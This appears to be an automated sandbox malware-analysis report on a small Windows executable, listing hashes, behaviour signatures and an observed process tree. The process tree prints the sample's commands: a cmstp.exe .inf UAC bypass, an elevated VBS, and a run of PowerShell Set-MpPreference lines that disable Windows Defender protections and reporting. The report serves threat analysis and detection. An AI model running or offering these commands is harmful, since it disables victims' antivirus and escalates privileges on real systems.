Resubmissions

24/02/2022, 22:11

220224-131k2sfaej 10

07/01/2021, 07:12

210107-27q11jvw52 10

Analysis

  • max time kernel
    43s
  • max time network
    111s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    07/01/2021, 07:12

General

  • Target

    qGHJqiji.bin.exe

  • Size

    9KB

  • MD5

    1c0d1af30fc12cb964335c0a20ffeedd

  • SHA1

    20669e2263e4939732a938e1bfa2f770e0f45aa4

  • SHA256

    5081ca4672184aaa9e4afa22aec015b79038fcca7d7f8c0650727c541c3d884b

  • SHA512

    b0541379baca8fc491b6027958b71672de886f13713f0704201d53b140b198f750c90c953ceeed221942cfe792e39fa22684aa0dd064f2aac719da193c5213d0

Score
10/10

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 523 IoCs
  • Suspicious use of AdjustPrivilegeToken 244 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\qGHJqiji.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\qGHJqiji.bin.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2604
    • \??\c:\windows\system32\cmstp.exe
      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\gvfid14o.inf
      2⤵
        PID:1556
    • C:\Windows\system32\cmd.exe
      cmd /c start C:\Windows\temp\ecacxa3p.vbs
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3356
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\temp\ecacxa3p.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1276
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Windows\temp\ecacxa3p.vbs" /elevate
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1012
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3132
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:908
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1852
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2228
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3412
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4060
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:184
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3908
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4228
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4444
    • C:\Windows\system32\taskkill.exe
      taskkill /IM cmstp.exe /F
      1⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:940

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/184-32-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/908-24-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/908-39-0x00000111511E0000-0x00000111511E1000-memory.dmp

      Filesize

      4KB

    • memory/1448-35-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/1556-9-0x00000119D9AE0000-0x00000119D9AE1000-memory.dmp

      Filesize

      4KB

    • memory/1556-7-0x00000119D9AE0000-0x00000119D9AE1000-memory.dmp

      Filesize

      4KB

    • memory/1852-27-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/2228-28-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/2604-3-0x0000000000D40000-0x0000000000D41000-memory.dmp

      Filesize

      4KB

    • memory/2604-2-0x00007FF897CB0000-0x00007FF89869C000-memory.dmp

      Filesize

      9.9MB

    • memory/3132-34-0x0000016D287B0000-0x0000016D287B1000-memory.dmp

      Filesize

      4KB

    • memory/3132-21-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/3412-29-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/3908-33-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/4060-31-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/4228-38-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB

    • memory/4444-40-0x00007FF896AB0000-0x00007FF89749C000-memory.dmp

      Filesize

      9.9MB